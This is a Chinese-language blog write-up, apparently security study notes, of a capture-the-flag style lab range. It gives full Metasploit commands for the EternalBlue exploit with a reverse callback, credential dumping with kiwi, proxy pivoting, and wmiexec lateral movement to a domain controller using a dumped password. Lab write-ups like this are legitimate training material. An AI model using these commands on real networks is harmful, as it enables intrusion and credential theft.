无境红日靶场一 wp

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP
  8. SQL注入(4)——实战SQL注入拿webshell
  9. Vulnhub靶机渗透之Me and My Girlfriend
  10. XSS漏洞
  11. 文件上传漏洞
  12. 文件上传绕过
  13. 文件包含漏洞
  14. Vulnhub靶机渗透之zico2
  15. 命令执行漏洞
  16. 逻辑漏洞(越权访问和支付漏洞)
  17. 网站后台安全
  18. weevely的使用及免杀(Linux中的菜刀)
  19. MSF(1)——一次完整的渗透流程
  20. WebShell命令执行限制(解决方案)
  21. 记一次艰难的SQL注入(过安全狗)
  22. MSF(2)——各种木马的生成及简单的免杀
  23. MSF(3)——apk和exe的加马(过360、火绒)
  24. 通过Frp解决实现内网穿透
  25. 改造冰蝎马,实现免杀之default_aes php
  26. 记一次简单的对盗号网站的渗透
  27. 记一次幸运的漏洞挖掘
  28. 内网渗透初探
  29. 记对外国某服务器的内网渗透
  30. 一次丝滑的内网渗透拿下域控
  31. 实战内网PTH上线域控
  32. 通过路由器进行内网渗透
  33. 钓鱼邮件和钓鱼样本
  34. 无境vulntarget-a wp
  35. 无境ZeroLogon 练习 wp
  36. 无境三层综合渗透 wp
  37. 无境红日靶场五 wp

一层Win7

信息收集

目标IP:192.168.111.20
nmap快速扫端口

nmap -p- -T4 --min-rate 2000 -n -Pn 192.168.111.20

在这里插入图片描述
80端口是一个phpStudy的探针,可以得到绝对路径为:C:/phpStudy/WWW
在这里插入图片描述
用fscan扫,发现存在永恒之蓝
在这里插入图片描述
这还说啥了,直接上msf

获取权限

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.111.20
set LHOST 192.168.111.25
set LPORT 6666
run

一阵输出后拿下meterpreter
在这里插入图片描述
还是SYSTEM权限,美滋滋
在这里插入图片描述

抓密码

load kiwi
creds_all

在这里插入图片描述
怎么直接把域控的密码给了,演都不演了是吧

横向

用msf自带模块进行域信息收集

run post/windows/gather/enum_domain

在这里插入图片描述
域控IP:192.168.52.138

二层域控

一级代理

用autoroute创建路由

run post/multi/manage/autoroute

在这里插入图片描述
然后用socks_proxy创建socks5代理

use auxiliary/server/socks_proxy
run

在这里插入图片描述
然后配好proxychains
在这里插入图片描述

wmiexec

直接用wmiexec横移过去

proxychains impacket-wmiexec GOD/Administrator:'qwe@123'@192.168.52.138

在这里插入图片描述
简单

评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值